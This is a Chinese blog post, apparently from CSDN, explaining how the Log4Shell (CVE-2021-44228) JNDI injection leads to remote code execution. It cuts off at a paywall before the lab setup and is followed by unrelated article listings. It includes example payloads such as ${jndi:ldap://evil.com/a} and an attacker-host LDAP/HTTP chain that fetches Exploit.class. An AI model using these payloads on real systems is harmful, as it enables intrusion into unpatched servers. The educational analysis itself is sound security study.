Log4j2漏洞原理深度解析与实战复现指南

最新推荐文章于 2026-06-20 09:02:55 发布
原创 最新推荐文章于 2026-06-20 09:02:55 发布 · 379 阅读 · 4
标签
#Log4j2漏洞 #远程代码执行 #RCE

1. 项目概述:为什么Log4j2漏洞能掀起如此巨浪?

2021年底,一个代号为“Log4Shell”的漏洞(CVE-2021-44228)震动了整个互联网技术圈。它不是一个普通的漏洞,而是一个潜伏在无数企业核心系统、云服务、开源组件中的“核弹级”隐患。简单来说,它允许攻击者通过一个精心构造的日志记录字符串,在目标服务器上远程执行任意代码(RCE)。想象一下,你只是在网站的搜索框里输入了一串看似无害的字符,比如 ${jndi:ldap://evil.com/a} ,服务器在记录这个搜索行为时,就会触发一连串连锁反应,最终从你控制的服务器上下载并执行恶意代码。这个漏洞的可怕之处在于其利用门槛极低、影响范围极广,几乎波及了所有使用Java技术栈的互联网服务。

我之所以花时间深入研究并复现这个漏洞,是因为它完美地诠释了现代软件供应链安全的脆弱性。Log4j2作为一个几乎无处不在的日志记录框架,其设计初衷是为了让开发者更方便地输出日志。然而,正是这个“方便”的特性——支持通过 ${} 语法进行变量插值和动态查找(Lookup)——在特定配置下,成为了攻击者打开系统大门的钥匙。理解它的原理,不仅是为了修复一个已知漏洞,更是为了建立一种对第三方组件、对看似无害的日志记录、对动态代码执行边界的深刻安全意识。无论你是安全研究员、运维工程师还是后端开发者,搞懂Log4j2 RCE,都是一次不可多得的安全实战课。

2. 漏洞原理深度拆解:从日志记录到远程代码执行

要理解CVE-2021-44228,我们不能只停留在“JNDI注入”这个表层概念,必须深入到Log4j2的日志处理流程和Java的类加载机制中去。

2.1 Log4j2的“魔法”字符串:Lookup与变量插值

Log4j2有一个强大的功能叫“Lookup”,它允许在配置文件和日志消息中通过 ${prefix:name} 的格式动态地插入变量值。例如, ${java:version} 可以插入Java版本, ${env:USER} 可以插入环境变量。这本身是一个便利功能。

问题的核心在于 JndiLookup 。JNDI(Java Naming and Directory Interface)是Java提供的一个统一接口,用于访问各种命名和目录服务,如LDAP、RMI、DNS等。 JndiLookup 允许通过JNDI从远程服务获取对象。在Log4j2 2.0-beta9到2.14.1版本中,默认配置下,当日志消息、日志参数甚至某些配置项(如 LoggerContext 名称)中包含 ${jndi:xxx} 这样的字符串时,Log4j2在记录日志的 消息格式化阶段 就会对其进行解析和执行。

关键点 :漏洞触发不依赖于特定的日志级别(如error、info)。只要日志被记录(即使最终因为级别过滤没输出到文件),消息处理流程就会走到解析 ${} 的环节。

2.2 攻击链的完整拼图:JNDI + LDAP + 反序列化/远程类加载

攻击者构造的payload通常长这样: ${jndi:ldap://attacker-controlled.com:1389/Exploit} 。当这条字符串被记录时,攻击链开始启动:

  1. Log4j2解析 :Log4j2的 StrSubstitutor MessagePatternConverter 识别出 ${jndi:...} 结构。
  2. JNDI查找 :调用 JndiLookup.lookup() 方法,该方法会使用初始上下文(InitialContext)去查找 ldap://attacker-controlled.com:1389/Exploit
  3. LDAP服务器响应 :攻击者控制的LDAP服务器(监听在1389端口)收到查询请求。它返回一个特殊的LDAP引用(Reference)响应,其中指向另一个HTTP服务地址,例如 http://attacker-controlled.com:8000/Exploit.class ,并指定了工厂类名(Factory Class Name)。
  4. Java动态类加载 :受害者的Java应用(即Log4j2所在应用)的JNDI客户端接收到LDAP引用后,会尝试从 http://attacker-controlled.com:8000/ 加载 Exploit.class 这个字节码文件。
  5. 恶意代码执行 :加载的 Exploit.class 被实例化,其静态代码块或构造函数中的恶意代码得以执行。这段代码通常会被编写成直接执行系统命令(如 Runtime.getRuntime().exec(“calc”) 或反弹Shell)。

这个过程中, 高版本JDK的默认安全限制是一个重要的变数 。在JDK 6u132, 7u122, 8u113 版本之前,JNDI自动加载远程对象的限制较弱。在此之后,默认情况下 com.sun.jndi.ldap.object.trustURLCodebase 属性被设置为 false ,禁止了从远程Codebase加载工厂类,这在一定程度上增加了利用难度。但攻击者仍有其他途径,比如利用本地ClassPath中已有的、具有危险方法的类(如 org.apache.naming.factory.BeanFactory 配合EL表达式)进行利用,或者攻击低版本JDK环境。

2.3 漏洞触发的必要条件与常见误区

很多人误以为只有打印 error 日志才会触发,这是不对的。实际上,任何会导致日志事件被创建和处理的路径都可能触发,包括:

  • logger.info(“User input: {}”, userInput); // 如果userInput包含payload
  • logger.error(“Login failed for user ” + username); // 字符串拼接时username包含payload
  • 在MDC(Mapped Diagnostic Context)、ThreadContext中设置的值,如果被日志模式(Pattern)引用。
  • 甚至在某些配置下, LoggerContext 的名称如果来自不可信源并被解析,也会触发。

另一个误区是认为只有Web应用才受影响。任何使用Log4j2记录日志的Java应用都可能受影响,包括桌面应用、后端服务、大数据组件(如Spark、Flink)、开发工具(如Jenkins)等。

3. 复现环境搭建与核心工具解析

纸上得来终觉浅,绝知此事要躬行。搭建一个隔离、安全的复现环境是理解漏洞的第一步。 强烈警告:所有操作必须在完全隔离的

最低0.47元/天 解锁文章
cihongmo6452
关注
Maven工程开启热部署
weixin_43572928的博客
09-09 3819
基于IDEA开发工具创建Maven工程开启热部署解决方案 注意:由于IDAE创建项目的方式有多种,接下来这种开启热部署的方法仅对和我创建项目的方式相同的情况有效 接下来我会先说明我是如何创建maven项目的,然后再讲这种方式创建的maven项目需要如何开启热部署 创建项目: 第一步:file->new->project 第二步:maven->next 选择通过maven帮助构建项目工程(注意:我没有勾选右面的create from arc…,也就意味着我没有让maven帮助我们添加骨架,
maven热部署项目到服务器
袖卷笛音的博客
01-01 2085
需求:将service服务热部署远程服务器上(我这里是部署的服务,web项目部署是一样的) 注意:想要在maven项目中进行tomcat的热部署,必须要开启Tomcat Manager 一。配置tomcat: 1.将项目部署到服务器上首先先需要一个tomcat服务,我们先在服务器上解压一个tomcat取名叫testtomcat: 启动tomcat,查看启动日志   可以看到...
Eclipse下的maven工程自动热部署方案(不用编译,不用重启tomcat)
panxingwu88的博客
12-02 8367
今天接了一个小小的web工程项目,就基于eclipse+maven的开发环境搭建了一个javaweb项目。结果在开发的过程中无比痛苦:修改代码-重新构建-重启tomcat-修改代码-重新构建-重启tomcat。。。。简直不能再浪费时间了,于是在网上搜了搜怎么去实现maven工程的热部署。久经波折,总算是搞定了,记录下来,以便以后不再掉坑: 由于mavne插件的强大,所以本方案也是基于ma
Maven 插件实现 Tomcat 热部署
liuningwcsdn的博客
04-04 1130
一、前言传统的部署项目方式:关闭 web 容器,将项目放入到 web 容器,启动 web 容器这个三个步骤。步骤不多,但是需要手动完成,频繁的操作总会让人心累。为了“解放双手”,实现自动化部署,本篇介绍通过使用 Maven 实现 Tomcat 的热部署。二、准备本次测试使用一台ip为 192.168.2.25 的虚拟机,系统为 centos 7.2,tomcat 使用 8.5 版本。2.1 配置 ...
MavenCI的一个学习站点
码农一个
08-30 194
MavenCI的一个学习的一个很好的资料: [url]http://www.4ucode.com/Study/Topic/1157241[/url]
Log4j22.15.0版漏洞(CVE-2021-45046)的注入原理复现步骤和如何修复(2.16.0修复原理)
跳小闹成长记
12-20 7773
Log4j2发布2.15.0版修复了Log4j2基于Ldap的注入漏洞之后。2.15.0的版本很快就被爆出了新的注入漏洞。但是这次漏洞爆出之后,大家却不怎么着急升级,到底是为什么呢?这就需要从该漏洞原理以及影响说起了。接下来我们就一起来探索下该漏洞原理复现步骤、影响范围,以及官方在2.16.0版本中是如何修复的。
Log4j22.16.0版漏洞(CVE-2021-45105)原理复现步骤和修复方法(2.17.0修复原理)
跳小闹成长记
12-22 6528
好不容易2.16.0发布之后,Log4j2官方,又突然发布了2.17.0版本,原因想必大家通过各种号推送都已经知道了。因为在2.16.0版本上发现了一个新的漏洞,该漏洞可能会导致DoS(Denial of Service)攻击。那这个漏洞到底是怎么回事呢?它会有哪些影响呢?今天咱们就一起来深度学习下该漏洞相关原理和攻击步骤。
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 1万+
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(二)—漏洞原理
热门推荐
跳小闹成长记
12-14 1万+
本文将和大家一起对Log4j2漏洞进行全面深入的剖析。我们将从如下几个方面进行讲解。 1、Log4j2漏洞的基本原理 2Log4j2漏洞在Java高低版本中的不同攻击原理 3、Log4j2漏洞在Java高低版本中的攻击步骤 4、Log4j2漏洞2.15.0-RC1中被绕过的原因 5、Log4j2最终修复方案(2.15.0)的原理
Log4j2漏洞深度解析:从原理实战复现安全加固
weixin_42530732的博客
06-20 459
Log4j2作为Java生态中广泛使用的日志记录框架,其核心功能之一是支持通过Lookup机制动态解析日志消息中的变量。然而,CVE-2021-44228(Log4Shell)漏洞的根源在于,该框架在记录日志时,会对用户输入中的${}表达式进行递归解析,且默认未对JNDI(Java命名和目录接口)等远程资源加载进行严格的安全限制。这一设计缺陷使得攻击者能够通过构造特殊的JNDI Lookup字符串(如${jndi:ldap://attacker.com/Exploit}),在日志记录过程中触发远程类加载,最
Log4j2漏洞深度复现:从JNDI注入到RCE攻击链实战剖析
weixin_28716443的博客
06-18 311
远程代码执行RCE漏洞是应用安全领域的核心威胁之一,其本质在于攻击者能够通过网络在目标系统上执行任意代码。这类漏洞的实现原理多样,常见于输入验证不严、反序列化缺陷或组件逻辑错误。在Java生态中,JNDI(Java命名和目录接口)作为一种服务查找机制,当其不可信数据结合时,可能成为RCE的利用入口,技术价值在于揭示了供应链攻击的广泛影响。Log4j2作为广泛使用的日志组件,其CVE-2021-44228漏洞正是通过JNDI注入实现RCE的典型案例,攻击者可通过精心构造的日志消息触发远程类加载。本文聚焦
Log4j2漏洞深度解析:从JNDI注入原理实战复现防御
weixin_29327977的博客
06-17 282
在Java应用开发中,日志记录是基础且关键的技术环节,它帮助开发者追踪程序运行状态和排查问题。其核心原理是通过日志框架对事件信息进行采集、过滤和输出。然而,当框架的动态解析功能外部输入结合时,可能引发严重的安全风险,例如远程代码执行RCE)。Log4j2作为广泛使用的日志组件,其提供的Lookup机制本意是增强日志的灵活性,允许在日志消息中嵌入动态变量。但该机制JNDI(Java命名和目录接口)服务结合后,在特定条件下会形成高危漏洞。攻击者通过构造特殊的日志输入,可触发框架执行非预期的JNDI查找,进
Log4j2漏洞原理深度解析实战复现:从JNDI注入到RCE攻击链
ckkay800264的博客
06-17 409
在Java应用开发中,日志记录是基础且关键的功能,它帮助开发者追踪程序行为、排查问题。其核心原理是通过日志框架对事件信息进行采集、过滤和输出。然而,当框架的设计特性Java平台服务结合时,可能引入严重的安全风险。JNDI(Java命名和目录接口)作为Java访问命名服务的标准API,其动态类加载机制在特定场景下具备强大的技术价值,例如实现资源的集中管理和动态扩展。但在日志处理流程中,如果未经严格校验的用户输入触发了JNDI查询,并指向攻击者控制的恶意服务,就会构成JNDI注入漏洞,导致远程代码执行RCE
Maven实现java web项目热部署
kiasur的博客
12-26 669
1.修改本机tomcat服务的的配置 在tomcat/conf/tomcat-users文件中添加<role rolename="manager-gui"/> <role rolename="manager-script"/> <user username="tomcat" password="123456" roles="manager-gui, manager-script"/> 在双击sta
maven tomcat plugin实现热部署
a468903507的专栏
04-30 1万+
总共分为五步: 1.在tomcat中配置用户权限,即添加管理员帐号 2.在maven中添加server,配置tomcat的管理员帐号密码 3.在project中添加插件,以及maven中配置的server, 4.设置部署命令 5.进行部署 附相关错误及解决办法 下面进行分步骤讲解: 一.在tomcat中配置用户权限,即添加管理员帐号. 我们需要实现热部署,自然
maven配置热部署
旺旺旺的博客
05-15 1395
1.引入devtools包 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-devtools</artifactId> <optional>true</optional> <sc
NVIDIA P106-100显卡驱动优化
最新发布
06-28
下载代码方式:https://pan.quark.cn/s/fea115dd1999 NVIDIA P106-100显卡的定制化驱动程序
基于风光储能和需求响应的微电网日前经济调度(Python代码实现)
06-28
内容概要:本文围绕基于风光储能和需求响应的微电网日前经济调度问题,提出了一种综合考虑风能、光伏等可再生能源出力不确定性、储能系统充放电特性以及需求响应机制的优化调度模型,并提供了完整的Python代码实现。该模型在满足系统功率平衡、设备运行约束等条件下,以最小化运行成本或最大化经济效益为目标,详细阐述了数学建模过程、目标函数构建、约束条件设定及求解算法的设计思路,具备较强的理论深度工程实用性。所附代码结构清晰,便于复现拓展,适用于科研学习实际项目仿真验证。; 适合人群:具备一定电力系统基础知识和Python编程能力的高校学生、研究人员及从事新能源微电网相关工作的工程师。; 使用场景及目标:①用于教学科研中深入理解微电网日前经济调度的核心原理建模方法;②为实际微电网项目的调度决策提供算法支持仿真工具;③作为进一步研究多能源协同优化、不确定性处理(如场景生成削减)、鲁棒优化或分布鲁棒优化的基础框架。; 阅读建议:建议读者结合文中代码逐行调试运行,深入理解各模块功能数据流向,同时可尝试修改模型参数、增加新的约束条件或引入其他智能优化算法进行对比分析,以提升对微电网优化调度问题的整体建模求解能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值